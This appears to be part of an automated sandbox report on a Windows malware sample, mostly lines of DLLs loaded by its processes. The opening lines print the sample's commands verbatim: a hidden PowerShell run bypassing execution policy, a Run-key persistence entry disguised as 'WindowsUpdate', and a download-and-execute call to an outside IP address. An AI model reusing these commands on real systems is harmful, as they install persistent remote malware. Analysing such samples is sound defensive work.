        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1"
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vk4yczyv.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9CAF.tmp" "c:\Users\user\AppData\Local\Temp\5trl00oq\CSC8D43AD1B76AB4ACB9D31FAE12D51980.TMP"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9D6A.tmp" "c:\Users\user\AppData\Local\Temp\CSC95BE416761534B22A9BF915F54099EA.TMP"
        Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roami
        Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roami
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: wsock32.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: winmm.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: version.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: wininet.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: dwmapi.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: textshaping.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: ntmarta.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: winhttpcom.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: winhttp.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: webio.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: mswsock.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: iphlpapi.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: winnsi.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: sspicli.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: mlang.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: dnsapi.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: rasadhlp.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: fwpuclnt.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: schannel.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: mskeyprotect.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: ntasn1.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: ncrypt.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: ncryptsslp.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: msasn1.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: cryptsp.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: rsaenh.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: gpapi.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exe | Section loaded: dpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: wsock32.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: winmm.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: version.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: wininet.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: dwmapi.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: textshaping.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: wldp.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: winhttpcom.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: winhttp.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: webio.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: mswsock.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: winnsi.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: sspicli.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: dnsapi.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: rasadhlp.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: fwpuclnt.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: schannel.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: mskeyprotect.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: ntasn1.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: ncrypt.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: ncryptsslp.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: msasn1.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: cryptsp.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: rsaenh.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: gpapi.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe | Section loaded: dpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: version.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: mscoree.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: version.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: mscoree.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\explorer.exe | Section loaded: mscoree.dll
        Source: C:\Windows\explorer.exe | Section loaded: amsi.dll
        Source: C:\Windows\explorer.exe | Section loaded: wbemcomn.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ntmarta.dll
        Source: C:\Windows\explorer.exe  Section loaded: aepic.dll
        Source: C:\Windows\explorer.exe  Section loaded: twinapi.dll
        Source: C:\Windows\explorer.exe  Section loaded: userenv.dll
        Source: C:\Windows\explorer.exe  Section loaded: iphlpapi.dll
        Source: C:\Windows\explorer.exe  Section loaded: powrprof.dll
        Source: C:\Windows\explorer.exe  Section loaded: windows.storage.dll
        Source: C:\Windows\explorer.exe  Section loaded: dxgi.dll
        Source: C:\Windows\explorer.exe  Section loaded: windows.storage.dll
        Source: C:\Windows\explorer.exe  Section loaded: kernel.appcore.dll
        Source: C:\Windows\explorer.exe  Section loaded: propsys.dll
        Source: C:\Windows\explorer.exe  Section loaded: coremessaging.dll
        Source: C:\Windows\explorer.exe  Section loaded: urlmon.dll
        Source: C:\Windows\explorer.exe  Section loaded: windows.storage.dll
        Source: C:\Windows\explorer.exe  Section loaded: windows.storage.dll
        Source: C:\Windows\explorer.exe  Section loaded: kernel.appcore.dll
        Source: C:\Windows\explorer.exe  Section loaded: wtsapi32.dll
        Source: C:\Windows\explorer.exe  Section loaded: wininet.dll
        Source: C:\Windows\explorer.exe  Section loaded: uxtheme.dll
        Source: C:\Windows\explorer.exe  Section loaded: dwmapi.dll
        Source: C:\Windows\explorer.exe  Section loaded: sspicli.dll
        Source: C:\Windows\explorer.exe  Section loaded: kernel.appcore.dll
        Source: C:\Windows\explorer.exe  Section loaded: twinapi.appcore.dll
        Source: C:\Windows\explorer.exe  Section loaded: ntmarta.dll
        Source: C:\Windows\explorer.exe  Section loaded: cryptsp.dll
        Source: C:\Windows\explorer.exe  Section loaded: wldp.dll
        Source: C:\Windows\explorer.exe  Section loaded: iertutil.dll
        Source: C:\Windows\explorer.exe  Section loaded: srvcli.dll
        Source: C:\Windows\explorer.exe  Section loaded: netutils.dll
        Source: C:\Windows\explorer.exe  Section loaded: umpdc.dll
        Source: C:\Windows\explorer.exe  Section loaded: ninput.dll
        Source: C:\Windows\explorer.exe  Section loaded: appresolver.dll
        Source: C:\Windows\explorer.exe  Section loaded: bcp47langs.dll
        Source: C:\Windows\explorer.exe  Section loaded: slc.dll
        Source: C:\Windows\explorer.exe  Section loaded: sppc.dll
        Source: C:\Windows\explorer.exe  Section loaded: profapi.dll
        Source: C:\Windows\explorer.exe  Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\explorer.exe  Section loaded: starttiledata.dll
        Source: C:\Windows\explorer.exe  Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\explorer.exe  Section loaded: idstore.dll
        Source: C:\Windows\explorer.exe  Section loaded: windows.applicationmodel.dll
        Source: C:\Windows\explorer.exe  Section loaded: appxdeploymentclient.dll
        Source: C:\Windows\explorer.exe  Section loaded: wlidprov.dll
        Source: C:\Windows\explorer.exe  Section loaded: samcli.dll
        Source: C:\Windows\explorer.exe  Section loaded: usermgrcli.dll
        Source: C:\Windows\explorer.exe  Section loaded: policymanager.dll
        Source: C:\Windows\explorer.exe  Section loaded: msvcp110_win.dll
        Source: C:\Windows\explorer.exe  Section loaded: usermgrproxy.dll
        Source: C:\Windows\explorer.exe  Section loaded: winsta.dll
        Source: C:\Windows\explorer.exe  Section loaded: sndvolsso.dll
        Source: C:\Windows\explorer.exe  Section loaded: mmdevapi.dll
        Source: C:\Windows\explorer.exe  Section loaded: devobj.dll
        Source: C:\Windows\explorer.exe  Section loaded: windows.staterepositoryclient.dll
        Source: C:\Windows\explorer.exe  Section loaded: oleacc.dll
        Source: C:\Windows\explorer.exe  Section loaded: wintypes.dll
        Source: C:\Windows\explorer.exe  Section loaded: textshaping.dll
        Source: C:\Windows\explorer.exe  Section loaded: windows.ui.dll
        Source: C:\Windows\explorer.exe  Section loaded: windowmanagementapi.dll
        Source: C:\Windows\explorer.exe  Section loaded: textinputframework.dll
        Source: C:\Windows\explorer.exe  Section loaded: inputhost.dll
        Source: C:\Windows\explorer.exe  Section loaded: coreuicomponents.dll
        Source: C:\Windows\explorer.exe  Section loaded: coreuicomponents.dll
        Source: C:\Windows\explorer.exe  Section loaded: windowscodecs.dll
        Source: C:\Windows\explorer.exe  Section loaded: dcomp.dll
        Source: C:\Windows\explorer.exe  Section loaded: d3d11.dll
        Source: C:\Windows\explorer.exe  Section loaded: resourcepolicyclient.dll
        Source: C:\Windows\explorer.exe  Section loaded: d3d10warp.dll
        Source: C:\Windows\explorer.exe  Section loaded: windows.cloudstore.dll
        Source: C:\Windows\explorer.exe  Section loaded: dxcore.dll
        Source: C:\Windows\explorer.exe  Section loaded: d2d1.dll
        Source: C:\Windows\explorer.exe  Section loaded: dwrite.dll
        Source: C:\Windows\explorer.exe  Section loaded: xmllite.dll
        Source: C:\Windows\explorer.exe  Section loaded: cldapi.dll
        Source: C:\Windows\explorer.exe  Section loaded: fltlib.dll
        Source: C:\Windows\explorer.exe  Section loaded: dataexchange.dll
        Source: C:\Windows\explorer.exe  Section loaded: appextension.dll
        Source: C:\Windows\explorer.exe  Section loaded: apphelp.dll
        Source: C:\Windows\explorer.exe  Section loaded: tiledatarepository.dll
        Source: C:\Windows\explorer.exe  Section loaded: staterepository.core.dll
        Source: C:\Windows\explorer.exe  Section loaded: windows.staterepository.dll
